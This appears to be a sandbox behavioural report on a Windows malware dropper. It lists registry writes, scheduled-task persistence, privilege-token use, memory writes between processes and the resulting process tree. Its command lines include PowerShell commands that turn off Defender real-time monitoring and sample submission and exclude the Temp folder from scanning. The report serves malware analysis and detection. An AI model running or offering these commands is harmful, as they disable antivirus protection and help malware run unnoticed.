Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SALSK.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed103b2f384c2a.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10d7483856.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed10799545d143108.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\Wed1095e8d3cef4ec773.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Gparted\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TNOCT.tmp\Wed10b607271059cb7.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3060 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3060 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3060 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3060 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3060 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3060 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3060 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2060 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe
PID 2060 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe
PID 2060 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe
PID 2060 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe
PID 2060 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe
PID 2060 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe
PID 2060 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe
PID 2848 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1676 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 1488 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe

"C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC084C3F6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a0affb29d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10b607271059cb7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10fa57e769925f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed103b2f384c2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10d7483856.exe

